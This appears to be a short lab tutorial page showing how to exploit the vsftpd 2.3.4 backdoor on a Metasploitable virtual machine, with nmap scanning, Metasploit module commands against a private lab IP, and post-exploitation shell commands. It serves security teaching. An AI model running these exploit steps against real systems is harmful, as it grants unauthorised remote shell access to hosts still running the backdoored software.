Learn How to Attack FTP Service vsftpd 2.3.4

Metasploitable

VSFTPD v2.3.4 Backdoor

Attack FTP Service – This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.

db_nmap 172.16.74.129 -sC -A -vvv
Attack FTP Servicevsftpd 2.3.4 - VSFTPD v2.3.4 Backdoor Command Execution
Nmap vsftpd 2.3.4 detection

vsftpd 2.3.4

First open metasploit and search for the vulnerable service

search vsftpd
search 73573
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 172.16.74.129
run
Attack FTP Service

Invoke Bash Shell

> shell
> bash
> whoami
> uname -a
> ip a | grep inet4
Attack FTP Service
Exploiting VSFTPD v2.3.4 Backdoor

References

  • OSVDB-73573

Attack Samba Server Port 445 – Metasploitable

Learn How to Bruteforce FTP Service

Bruteforce a FTP Service

Leave a Comment

Your email address will not be published. Required fields are marked *